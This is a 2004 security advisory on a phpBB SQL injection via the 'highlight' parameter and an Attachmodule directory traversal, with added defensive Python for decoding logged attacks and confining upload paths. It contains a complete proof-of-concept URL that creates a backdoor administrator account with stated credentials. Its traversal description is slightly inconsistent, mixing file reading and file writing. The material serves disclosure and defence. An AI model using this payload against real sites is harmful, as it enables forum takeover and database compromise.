Date: 29 Nov 2004 10:54:57 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [UNIX] phpBB SQL Injection and Attachmodule Add-On Directory Traversal
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
phpBB SQL Injection and Attachmodule Add-On Directory Traversal
------------------------------------------------------------------------
SUMMARY
<http://www.phpbb.com/> phpBB is "a high powered, fully scalable, and
highly customizable open-source bulletin board package. phpBB has a
user-friendly interface, simple and straightforward administration panel,
and helpful FAQ. Based on the powerful PHP server language and your choice
of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
ideal free community solution for all web sites."
An SQL injection vulnerability exists in phpBB itself, and a directory
traversal vulnerability exists in the Attachmodule add-on.
DETAILS
Vulnerable Systems:
* phpBB versions prior to 2.0.11
* Attachmodule, all versions
Immune Systems:
* phpBB version 2.0.11
The 'highlight' parameter of viewtopic.php is URL-decoded a second time
after the web server has already decoded it. A double-encoded single quote
(%2527) therefore passes the quote escaping applied to request data as the
harmless text %27 and only becomes a literal ' inside phpBB, after all
escaping is done. The decoded string is then embedded in PHP code that phpBB
evaluates while highlighting search terms (a preg_replace() call with the e
modifier), so what is injected is a PHP expression rather than a raw SQL
fragment; the proof of concept below uses it to call mysql_query() and
thereby runs arbitrary SQL against the back-end database with the privileges
of phpBB's database account. The statement is assembled from chr() calls so
that the payload contains no quote characters of its own.
The following SQL statement will add a user with administrative rights on
the system:
INSERT INTO phpbb_users(user_id, user_active, username, user_password,
user_level) VALUES ('99999', '1', 'ze3lock',
'ba3c83348bddf7b368b478ac06d3340e', '1')
The account can then be used with the following credentials:
username: ze3lock
pass: thepass
Note: The query assumes the default table prefix, so that the user table is
called 'phpbb_users', as it is on most phpBB installations. On a site that
changed the prefix at install time the INSERT fails, and the correct table
name has to be discovered before exploitation can take place.
The exploit requires no registered account: any visitor to a site running
phpBB can issue the request, which makes it a prime target for automated
scripts that plant backdoors on many sites around the web. A proof-of-concept
HTTP request is given below. To make it work, the 't' parameter must be set
to the id of an existing topic on the target forum, which is trivial to find.
The URL is shown wrapped over several lines; it is sent as a single line.
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)
%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)
%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)
%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)
%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)
%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)
%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)
%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)
%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)
%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)
%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)
%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)
%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)
%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)
%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)
%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)
%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
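The following Python is an added editorial example, not code from the advisory, from phpBB or from Zeelock. It emulates the decode path described above (the slash-escaping of request values stands in for magic_quotes_gpc, or for phpBB 2's own fallback that applies addslashes() when magic quotes are off), shows why a single-encoded quote is neutralised while a double-encoded one is not, and decodes the proof-of-concept URL back into the SQL statement it runs. 'site.com' and 't=30' are the advisory's placeholders; the function names and the log-triage check at the end are ours.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# The proof-of-concept URL printed in the advisory, wrapped there for width
# and reassembled into one string here.
POC_URL = (
    "http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr(73)%252echr(78)"
    "%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)%252echr(73)%252echr(78)"
    "%252echr(84)%252echr(79)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(98)"
    "%252echr(98)%252echr(95)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)"
    "%252echr(40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)"
    "%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)"
    "%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%252echr(44)"
    "%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%252echr(97)%252echr(109)"
    "%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)"
    "%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(111)%252echr(114)"
    "%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)"
    "%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32)"
    "%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%252echr(32)"
    "%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(57)%252echr(57)"
    "%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(44)%252echr(39)"
    "%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(111)%252echr(99)%252echr(107)"
    "%252echr(39)%252echr(44)%252echr(39)%252echr(98)%252echr(97)%252echr(51)%252echr(99)"
    "%252echr(56)%252echr(51)%252echr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)"
    "%252echr(100)%252echr(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)"
    "%252echr(98)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)"
    "%252echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252echr(101)"
    "%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527"
)


def addslashes(s):
    """PHP addslashes(): what magic_quotes_gpc (or phpBB 2's own fallback)
    applies to every request value before a script sees it.  Emulation."""
    return re.sub(r"(['\"\\])", r"\\\1", s)


def http_get_var(raw):
    """$HTTP_GET_VARS['highlight']: the web server percent-decodes the query
    string once, then the value is slash-escaped."""
    return addslashes(unquote_plus(raw))


def highlight_2_0_10(raw):
    """phpBB 2.0.10 ran urldecode() on the already-decoded value.  %2527 is
    %27 after the first decode, carries no quote for addslashes() to escape,
    and only turns into a literal ' here, after escaping is over."""
    return unquote_plus(http_get_var(raw))


def highlight_2_0_11(raw):
    """2.0.11 dropped that second urldecode(): %2527 stays the text %27."""
    return http_get_var(raw)


CHR_CALL = re.compile(r"chr\((\d+)\)")


def expand_chr_chain(php_expr):
    """chr(73).chr(78)... -> the text those bytes spell."""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(php_expr))


def raw_query_param(url, name):
    """Return a query parameter still percent-encoded (parse_qs would decode it)."""
    for part in urlsplit(url).query.split("&"):
        key, _, value = part.partition("=")
        if key == name:
            return value
    return ""


def recover_sql(url):
    """Run a logged request URL through the 2.0.10 decode path and pull the
    statement out of the mysql_query(...) call the payload makes."""
    decoded = highlight_2_0_10(raw_query_param(url, "highlight"))
    m = re.search(r"mysql_query\((.*)\)", decoded)
    return expand_chr_chain(m.group(1)) if m else ""


DOUBLE_ENCODED = re.compile(r"%25[0-9A-Fa-f]{2}")


def looks_like_highlight_attack(url):
    """Log triage: phpBB's own search links encode 'highlight' once, so a
    double-encoded byte or a chr() call in it is a strong attack indicator."""
    raw = raw_query_param(url, "highlight")
    return bool(DOUBLE_ENCODED.search(raw)) or "chr(" in unquote_plus(raw).lower()


if __name__ == "__main__":
    print(highlight_2_0_10("%27"), highlight_2_0_10("%2527"), highlight_2_0_11("%2527"))
    print(recover_sql(POC_URL))
```

Running it prints \' for the single-encoded quote (still escaped), a bare ' for the double-encoded one under 2.0.10, %27 under 2.0.11, and the INSERT statement from the advisory. recover_sql() is written for the mysql_query() shape of this proof of concept; payloads that call other PHP functions need the regex adjusted, but the decode path and the double-encoding indicator are the same.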
In addition, a directory traversal bug in the Attachmodule add-on allows an
attacker to read any file on the local filesystem of the server running
phpBB. The culprit is the 'UPLOAD_DIR' argument, which is not sanitized: it
names the directory that uploaded files are written to, and it accepts any
characters, including path separators and '..' sequences, so an attacker can
point it outside the intended directory and overwrite files on the server as
well.
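The following Python is an added editorial example, not Attachmodule or phpBB code, of the kind of check the 'UPLOAD_DIR' argument lacks: the requested directory is resolved against a fixed base and rejected when the result lies outside it. The base path, the sample inputs and the function names are constructed for the demonstration.

```python
import os


class UploadDirError(ValueError):
    """Raised when a requested directory would land outside the base."""


def resolve_upload_dir(base_dir, requested):
    """Resolve `requested` relative to base_dir and return the absolute path,
    or raise UploadDirError.  The decision is made on the resolved path, not
    on the characters of the input, so '..' segments, absolute paths and
    symlinks that point out of the base all fail the same comparison."""
    if "\x00" in requested:
        # PHP 4 filesystem calls truncated at a NUL byte; never let one through.
        raise UploadDirError("NUL byte in upload dir")
    base = os.path.realpath(base_dir)
    # join() drops `base` when `requested` is absolute; the containment test
    # below then rejects it, which is what we want.
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise UploadDirError("upload dir escapes %s: %r" % (base, requested))
    return candidate


def is_confined(base_dir, requested):
    """Boolean form of resolve_upload_dir() for callers that want yes/no."""
    try:
        resolve_upload_dir(base_dir, requested)
    except UploadDirError:
        return False
    return True


BASE = "/var/www/forum/files"          # constructed example base directory
SAMPLES = [
    "attachments",                     # ok
    "2004/11",                         # ok, nested
    "../../../../etc",                 # traversal
    "/etc",                            # absolute path
    "attachments/../../config.php",    # traversal behind a valid prefix
    "a\x00/../../etc",                 # NUL truncation attempt
]

if __name__ == "__main__":
    for s in SAMPLES:
        print("%-34r %s" % (s, "ok" if is_confined(BASE, s) else "REJECTED"))
```

Because the comparison is made after realpath(), a symlink created inside the base that points elsewhere is rejected too, which a blacklist of '..' and '/' would miss. The check says nothing about what happens between the check and the write; if the directory tree is writable by other local users, the resolved path should be opened and checked again, or the base kept out of their reach.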
Vendor Status:
Users are strongly encouraged to upgrade to phpBB 2.0.11, which fixes the
SQL injection, and to add input validation to the 'UPLOAD_DIR' argument of
Attachmodule, for which no fixed release is listed.
ADDITIONAL INFORMATION
The information has been provided by <mailto:zee@psybnc.it> Zeelock.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.